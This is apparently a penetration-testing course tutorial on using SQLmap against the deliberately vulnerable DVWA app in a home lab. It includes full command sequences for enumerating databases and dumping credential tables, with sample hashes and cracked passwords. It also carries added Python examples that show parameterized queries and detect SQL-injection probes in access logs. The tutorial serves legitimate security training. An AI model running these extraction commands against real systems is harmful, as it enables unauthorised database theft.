Authorised targets only. All SQLmap commands target DVWA in your own isolated home lab. SQLmap generates high-volume HTTP traffic clearly visible in server logs and IDS. Never run it against systems you don’t own or lack explicit written authorisation to test. Lab: Ethical Hacking Lab Setup.

Day 6 (Nikto) flagged a potential SQL injection endpoint. Day 7 teaches you to confirm it and pull every credential, every table, and every piece of data from the database in minutes. SQLmap automates what would take hours of manual UNION payload crafting, and on a confirmed-vulnerable DVWA endpoint a single three-command sequence goes from zero to a full credential dump in under 90 seconds. Understanding what it is doing beneath the surface is what separates a professional who can adapt when automation fails from one who is lost without it. That is exactly what this SQLmap tutorial covers.

Day 7 covers SQLmap end to end: installation, basic URL scanning, the full DVWA walkthrough, using Burp Suite request files (the professional method), every important flag, POST form testing, and the command patterns you will use in every authorised web application assessment.


What Is SQLmap & How It Works

SQLmap is an open-source automated SQL injection detection and exploitation tool. It works by sending crafted HTTP requests to a target parameter, analysing the database’s response behaviour to determine whether injection is possible, then systematically extracting the database schema and data using the confirmed injection channel.

It detects five injection types automatically: boolean-based blind (true/false responses differ), time-based blind (delays reveal data bit by bit), error-based (database errors leak data), UNION query (appends SELECT to extract data), and stacked queries (semicolon-separated statement injection). It supports MySQL, PostgreSQL, MSSQL, Oracle, SQLite, and 20+ other database systems.

📚 Manual first, always. The professional workflow is: (1) confirm injection manually with a single quote and a boolean condition in Burp Repeater, (2) use SQLmap for systematic extraction. Manual first prevents false positives. See: SQL Injection Tutorial Step-by-Step and DVWA Day 4: SQL Injection.
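
Why the boolean-based check described above works, and why a bound parameter removes the signal: an added example, not part of the original course and not DVWA's own code. The table, the function names and the two probe strings are constructed for illustration, with Python's built-in sqlite3 standing in for the lab database.

```python
import sqlite3

def make_db():
    """Constructed two-row table standing in for the lab application's users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn

def lookup_concatenated(conn, user_id):
    """Vulnerable: the parameter is pasted into the SQL text and parsed as SQL."""
    sql = "SELECT first_name FROM users WHERE user_id = " + user_id
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, user_id):
    """Hardened: the parameter is bound as data and never reaches the SQL parser."""
    return conn.execute(
        "SELECT first_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()

def boolean_signal(lookup, conn):
    """True when an always-true and an always-false condition change the response."""
    return lookup(conn, "1 AND 1=1") != lookup(conn, "1 AND 1=2")

if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_concatenated, lookup_parameterized):
        print(fn.__name__, "legit:", fn(db, "1"), "signal:", boolean_signal(fn, db))
```

With the concatenated query the two probes return different rows, which is the true/false difference a scanner keys on; with the bound parameter both probes are compared as plain text against `user_id` and return nothing.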

Install & Verify SQLmap on Kali Linux

# Pre-installed on Kali Linux — verify:
sqlmap --version
1.8.#stable — https://sqlmap.org

# Update to latest version:
sqlmap --update

# Install if missing:
sudo apt install sqlmap -y

# View all options:
sqlmap -hh # full help (vs -h for short help)


Basic URL Scan — Your First SQLmap Commands

# ─── Basic GET parameter scan ────────────────────────────────────
sqlmap -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
       --cookie="PHPSESSID=abc123; security=low" --batch

# SQLmap tests the 'id' parameter and reports injection type found

# ─── List all databases ──────────────────────────────────────────
sqlmap -u "…?id=1&Submit=Submit" --cookie="…" --dbs --batch

[*] available databases [2]:
[*] dvwa
[*] information_schema


Full DVWA Walkthrough — Zero to Credential Dump

The complete four-command sequence that takes you from detecting an injection to extracting usernames and password hashes. All commands target DVWA in your authorised home lab.

Kali Linux — SQLmap Full DVWA Extraction (Authorised Home Lab)
# STEP 1: Enumerate databases
└─$ sqlmap -r dvwa_sqli.txt --dbs --batch
[*] dvwa
[*] information_schema
# STEP 2: List tables in dvwa
└─$ sqlmap -r dvwa_sqli.txt -D dvwa --tables --batch
[*] guestbook
[*] users
# STEP 3: Dump users table
└─$ sqlmap -r dvwa_sqli.txt -D dvwa -T users --dump --batch
+----+-------+----------------------------------+
| id | user  | password (MD5)                   |
+----+-------+----------------------------------+
| 1  | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 2  | gordo | e99a18c428cb38d5f260853678922e03 |
| 3  | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 |
+----+-------+----------------------------------+
→ Crack with John the Ripper (Day 5): admin=password, gordo=abc123, pablo=letmein

SQLmap full DVWA extraction using a -r Burp request file, three commands in sequence: --dbs (discover databases), -D dvwa --tables (list tables), -D dvwa -T users --dump (extract all rows). Result: three usernames and MD5 password hashes extracted in under 90 seconds. The hashes feed directly into John the Ripper (Day 5) for offline cracking. This is the complete database compromise path in an authorised lab assessment.

# ─── Complete 4-command extraction sequence ──────────────────────

# 1. Detect injection + enumerate databases
sqlmap -r dvwa_sqli.txt --dbs --batch

# 2. List tables in target database
sqlmap -r dvwa_sqli.txt -D dvwa --tables --batch

# 3. List columns in users table
sqlmap -r dvwa_sqli.txt -D dvwa -T users --columns --batch

# 4. Dump the entire users table
sqlmap -r dvwa_sqli.txt -D dvwa -T users --dump --batch


Burp Suite Request File (-r) — The Professional Method

For complex authenticated requests with POST bodies, multiple cookies, or custom headers, saving the request from Burp and passing it with -r is the most reliable approach. SQLmap reads every header, cookie, and parameter exactly as captured, removing manual specification errors.

# ─── In Burp Suite ────────────────────────────────────────────────
# Proxy → HTTP History → right-click target request
# → Save item → save as dvwa_sqli.txt

# ─── Contents of saved request file ─────────────────────────────
GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 192.168.56.101
Cookie: PHPSESSID=abc123; security=low
User-Agent: Mozilla/5.0 …

# ─── Run SQLmap with the file — all headers handled automatically
sqlmap -r dvwa_sqli.txt --dbs --batch
sqlmap -r dvwa_sqli.txt -D dvwa -T users --dump --batch
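
Because -r replays the captured headers, including the browser User-Agent, spotting this traffic in the lab server's access log cannot rely on sqlmap's default User-Agent alone. The following added example (not part of the original course) flags a client either by that default string or by many distinct SQL-looking values sent to one parameter; the log lines, the threshold and the marker regex are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache/Nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Heuristic markers of SQL syntax in a decoded parameter value (assumption:
# tune per application; free-text fields will need a higher threshold).
SQL_HINT = re.compile(
    r"'|--|\b(?:union|select|sleep|benchmark)\b|\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)

def flag_sources(lines, min_variants=3):
    """Return {client_ip: [reasons]} for clients that look like automated SQLi testing."""
    variants = defaultdict(set)  # (ip, path, param) -> distinct SQL-looking values
    reasons = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if "sqlmap" in m["ua"].lower():
            reasons[m["ip"]].add("default sqlmap User-Agent")
        url = urlsplit(m["target"])
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if SQL_HINT.search(value):
                variants[(m["ip"], url.path, name)].add(value)
    for (ip, path, name), values in variants.items():
        if len(values) >= min_variants:
            reasons[ip].add(f"{len(values)} SQL-like values for '{name}' on {path}")
    return {ip: sorted(r) for ip, r in reasons.items()}

def _line(ip, target, ua="Mozilla/5.0"):
    return (f'{ip} - - [01/Jan/2025:10:00:00 +0000] "GET {target} HTTP/1.1" '
            f'200 1500 "-" "{ua}"')

SQLI = "/dvwa/vulnerabilities/sqli/?Submit=Submit&id="
SAMPLE_LOG = [  # constructed lines, not captured traffic
    _line("192.168.56.10", SQLI + "1"),
    _line("192.168.56.10", SQLI + "1%27"),
    _line("192.168.56.10", SQLI + "1%20AND%201%3D1"),
    _line("192.168.56.10", SQLI + "1%20AND%201%3D2"),
    _line("192.168.56.20", SQLI + "2", ua="sqlmap/1.8#stable (https://sqlmap.org)"),
    _line("192.168.56.30", "/dvwa/index.php"),
]

if __name__ == "__main__":
    for ip, why in flag_sources(SAMPLE_LOG).items():
        print(ip, why)
```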


All Important Flags — Explained

SQLMAP FLAG REFERENCE — KALI LINUX COURSE DAY 7 — securityelites.com
TARGET FLAGS
-u URL        Target URL with parameter
-r file       Burp request file (preferred)
-p param      Test specific parameter only
--forms       Auto-detect & test HTML forms
--data=str    POST body string

EXTRACTION FLAGS
--dbs         Enumerate all databases
-D name       Select database
--tables      List tables in database
-T name       Select table
--columns     List columns in table
--dump        Extract all table data
--dump-all    Dump entire database

BEHAVIOUR FLAGS
--batch       Non-interactive mode
--level=1-5   Test depth (default: 1)
--risk=1-3    Payload aggression
--threads=N   Concurrent requests
--timeout=N   Seconds per request
--cookie=str  Session cookie
--proxy=URL   Route via Burp

LEVEL & RISK EXPLAINED
level 1       Standard GET/POST params
level 2       + cookies tested
level 3       + HTTP User-Agent header
level 4       + Referer header
level 5       + HTTP Host header
──────────────────────────
risk 1        Safe payloads (default)
risk 2        + heavy time-based
risk 3        + UPDATE statements ⚠️

SQLmap Flag Reference Card, four panels: target flags (-u URL vs -r Burp file; always prefer -r for complex authenticated requests), extraction flags (the --dbs → -D → --tables → -T → --dump chain), behaviour flags (--batch is essential, --level/--risk expand coverage at cost of speed), and level/risk explanation. Risk 3 includes UPDATE payloads: only use it on isolated lab targets, as it can modify database records.

POST Forms, Authentication & Advanced Scans

# ─── POST form scan ──────────────────────────────────────────────
sqlmap -u "http://192.168.56.101/login.php" \
       --data="username=admin&password=test" --dbs --batch

# ─── Auto-detect and test all forms on a page ────────────────────
sqlmap -u "http://192.168.56.101/dvwa/" --forms --dbs --batch

# ─── Test specific parameter only ────────────────────────────────
sqlmap -u "http://target.com/search?q=test&page=1" \
       -p q --dbs --batch # only test 'q', skip 'page'

# ─── Thorough scan (slower, more injection types found) ──────────
sqlmap -r request.txt --level=5 --risk=2 --dbs --batch

# ─── Route through Burp (see every request in real time) ─────────
sqlmap -r request.txt --proxy=http://127.0.0.1:8080 --dbs --batch


Reading SQLmap Output — What Each Line Means

# Sample SQLmap output — annotated:
[INFO] testing if GET parameter 'id' is dynamic ← checks if param affects response
[INFO] GET parameter 'id' appears to be dynamic ← good, varies with input
[INFO] heuristic detects web page charset as 'UTF-8'
[WARNING] GET parameter 'id' does not seem to be injectable ← not injectable

# OR, when injectable:
[INFO] GET parameter 'id' is 'AND boolean-based blind' injectable
[INFO] GET parameter 'id' is 'MySQL >= 5.0 UNION query' injectable
[INFO] sqlmap identified the following injection point(s)…

# Results saved to:
/root/.sqlmap/output/192.168.56.101/dump/dvwa/users.csv
# SQLmap saves ALL results automatically — check this folder after every scan

📋 SQLmap Command Reference Card

SQLMAP REFERENCE CARD — DAY 7 — securityelites.com
FULL EXTRACTION (BURP FILE)
sqlmap -r req.txt --dbs --batch
sqlmap -r req.txt -D db --tables --batch
sqlmap -r req.txt -D db -T tbl --dump --batch

GET URL SCAN
sqlmap -u "URL?id=1" \
  --cookie="PHPSESSID=abc" \
  --dbs --batch

POST FORM
sqlmap -u "URL" \
  --data="user=a&pass=b" \
  --dbs --batch

RESULTS LOCATION
/root/.sqlmap/output/
→ [target-ip]/dump/
→ [database]/[table].csv
All dumps auto-saved here

SQLmap Reference Card — Day 7 Kali Linux Course. Four patterns: full extraction using a Burp -r file (the professional standard), GET URL scan with cookie, POST form testing, and results location. SQLmap auto-saves all extracted data to /root/.sqlmap/output/ — always check this folder after every scan. Authorised DVWA lab use only.

Frequently Asked Questions – SQLMAP Tutorial

What is SQLmap used for?
Automated SQL injection detection and data extraction in authorised web application penetration tests. Detects five injection types across 20+ database systems. Use after manually confirming a vulnerability exists.
Is SQLmap legal?
Legal on systems you own or have explicit written authorisation to test — DVWA home lab, TryHackMe, HackTheBox, authorised bug bounty targets where automated scanning is in scope. Illegal on any unauthorised system regardless of intent.
Manual SQL injection vs SQLmap — when to use each?
Manual: confirm the vulnerability with quote test and boolean condition. SQLmap: systematic extraction after confirmation. Always manual first — prevents false positives and ensures you understand what you’re exploiting.
How do I use SQLmap with a Burp request file?
Burp → right-click request → Save item → save as request.txt. Then: sqlmap -r request.txt --dbs --batch. All cookies, headers and POST params handled automatically.
What does --batch do?
Makes SQLmap non-interactive: it accepts all default answers to prompts automatically. Essential for running scans to completion without monitoring. Always combine with --dbs or --dump.
Most important SQLmap flags?
-r (Burp file), --dbs, -D/-T/--dump (extraction chain), --batch, --level/--risk, --forms, --threads.

Mr Elite
Founder, SecurityElites.com

SQLmap is automation, not magic. The professionals who use it best understand manual SQL injection first — they recognise what SQLmap is doing when it works, and they know what to do manually when it doesn’t. Build the manual understanding from the DVWA SQL Injection series before relying on this tool in a real assessment. Automation accelerates what you already know; it does not replace the knowledge.
